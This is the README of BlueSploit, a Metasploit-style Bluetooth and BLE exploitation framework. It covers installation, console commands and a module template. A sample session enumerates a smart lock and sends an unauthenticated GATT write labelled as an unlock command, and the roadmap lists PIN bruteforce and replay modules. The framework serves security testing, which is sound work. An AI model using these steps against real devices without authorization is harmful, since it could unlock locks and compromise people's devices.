Bluetooth Exploitation Framework
A Metasploit-style modular framework for Bluetooth Classic and BLE security testing.
I started building this with a purpose. Since it's an early version, there may be stability issues and false positives. I'm still working on it, so please be patient.

- Device Discovery - Scan for nearby BLE and Classic Bluetooth devices
- GATT Enumeration - Enumerate services, characteristics, and descriptors
- Exploit Modules - Ready-to-use exploits for common vulnerabilities
- Credential Testing - Test for default/weak PINs and pairing vulnerabilities
- Modular Architecture - Easy to extend with custom modules
- Result Export - Save scan results and loot to JSON
```bash
# Clone the repository
git clone https://github.com/v33ru/bluesploit.git
cd bluesploit

# Create a Python virtual environment
python3 -m venv env
source env/bin/activate

# Install dependencies
pip install -r requirements.txt

# Run BlueSploit
python bluesploit.py
```

- Python 3.10+
- Bluetooth adapter (built-in or USB dongle)
- Linux: BlueZ stack installed (Bleak talks to BlueZ over D-Bus)
- macOS: works out of the box
- Windows: requires Windows 10+ with BLE support
```
$ python bluesploit.py

  [BlueSploit ASCII-art logo]

  Bluetooth Exploitation Framework v1.0.0

  Author    : v33ru / Mr-IoT
  Community : IoT Security Research Group (IOTSRG)
  GitHub    : https://github.com/v33ru

  [+] BLE Scanning & Enumeration      [+] GATT Service Analysis
  [+] Bluetooth Classic Attacks       [+] Vulnerability Detection
  [+] Exploitation Modules            [+] Protocol Reverse Engineering

  Type 'help' for commands    Type 'show modules' to list modules
```
```
bluesploit > help

Core Commands
=============
    use <module>        Load a module
    back                Unload current module
    search <keyword>    Search for modules
    show <type>         Show modules/options

Module Commands
===============
    set <opt> <val>     Set module option
    unset <option>      Clear module option
    options             Show module options
    info                Show module info
    run / exploit       Execute module
    check               Check if vulnerable

Utility Commands
================
    clear               Clear screen
    reload              Reload modules
    setg <opt> <val>    Set global option
    banner              Show banner
    exit / quit         Exit BlueSploit
```
```
bluesploit > use scanners/ble/discovery
bluesploit (scanners/ble/discovery) > set timeout 15
bluesploit (scanners/ble/discovery) > run
[*] Scanning for BLE devices (15s)...
[+] AA:BB:CC:DD:EE:FF - Smart Lock [-45 dBm] [Nordic Semiconductor]
[+] 11:22:33:44:55:66 - MI Band 7 [-62 dBm] [Xiaomi]
[+] Found 2 devices
```
```
bluesploit > use scanners/ble/gatt_enum
bluesploit (scanners/ble/gatt_enum) > set target AA:BB:CC:DD:EE:FF
bluesploit (scanners/ble/gatt_enum) > run
[+] Connected to AA:BB:CC:DD:EE:FF
[*] Enumerating GATT services...

[Service] 00001800-0000-1000-8000-00805f9b34fb
          Generic Access (Handle: 0x0001)
  ├── [Char] 00002a00-0000-1000-8000-00805f9b34fb
  │          Device Name
  │          Properties: read
  │          Value: Smart Lock

[Service] 0000fee0-0000-1000-8000-00805f9b34fb
          Custom Service (Handle: 0x0010)
  ├── [Char] 0000fee1-0000-1000-8000-00805f9b34fb  [!] VULN
  │          Properties: write-without-response, notify
  │          [!] UNAUTH_WRITE_POSSIBLE: Write-without-response enabled
```
```
bluesploit > use exploits/ble/unauth_write
bluesploit (exploits/ble/unauth_write) > set target AA:BB:CC:DD:EE:FF
bluesploit (exploits/ble/unauth_write) > set char_uuid 0000fee1-0000-1000-8000-00805f9b34fb
bluesploit (exploits/ble/unauth_write) > set payload 0601    # Unlock command
bluesploit (exploits/ble/unauth_write) > check
[*] Checking AA:BB:CC:DD:EE:FF for vulnerability...
[+] Found characteristic: 0000fee1-0000-1000-8000-00805f9b34fb
[+] VULNERABLE: Write-without-response enabled!
bluesploit (exploits/ble/unauth_write) > run
[+] Connected to AA:BB:CC:DD:EE:FF
[+] Payload delivered!
```
```
modules/
├── scanners/               # Discovery & enumeration
│   ├── ble/
│   │   ├── discovery.py    # BLE device discovery
│   │   └── gatt_enum.py    # GATT service enumeration
│   └── classic/
│       └── sdp_enum.py     # SDP service discovery
├── exploits/               # Vulnerability exploits
│   ├── ble/
│   │   └── unauth_write.py # Unauthenticated GATT write
│   └── classic/
│       └── ...
├── creds/                  # Credential attacks (not the right folder yet; being fixed for the full release)
│   └── ...
├── auxiliary/              # Support modules
│   └── ...
└── payloads/               # Payload generators
    └── ...
```
Create a new module in the appropriate directory:

```python
# modules/scanners/ble/my_scanner.py
from core.base import ScannerModule, ModuleInfo, ModuleOption, BTProtocol, Severity


class Module(ScannerModule):
    info = ModuleInfo(
        name="scanners/ble/my_scanner",
        description="My custom BLE scanner",
        author=["your_name"],
        protocol=BTProtocol.BLE,
        severity=Severity.INFO,
    )

    def _setup_options(self):
        # Options the user can set with `set <opt> <val>`; the second argument marks required options
        self.options = {
            "target": ModuleOption("target", True, "Target BD_ADDR"),
            "timeout": ModuleOption("timeout", False, "Scan timeout", default=10),
        }

    def run(self) -> bool:
        # Your scanning logic here; return True on success
        target = self.get_option("target")
        print(f"Scanning {target}...")
        return True
```

Contributions are welcome! Please feel free to submit a Pull Request.
- Fork the repository
- Create your feature branch (`git checkout -b feature/new-module`)
- Commit your changes (`git commit -am 'Add new module'`)
- Push to the branch (`git push origin feature/new-module`)
- Open a Pull Request
- Bluetooth Classic support (BR/EDR)
- PIN bruteforce module
- BTSnoop log analyzer (GhostWrite integration)
- Replay attack module
- Database for session/loot storage
- Ubertooth integration
- BTLEJuice integration
This tool is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Users are responsible for complying with all applicable laws. The authors assume no liability for misuse.
v33ru / Mr-IoT - IoT Security Research Group (IOTSRG)
- GitHub: @v33ru
- Research: Pre-Pairing Attack Surface in BLE
MIT License - See LICENSE for details.
- Inspired by RouterSploit and Metasploit
- Built with Bleak for cross-platform BLE support
- Thanks to the Bluetooth security research community
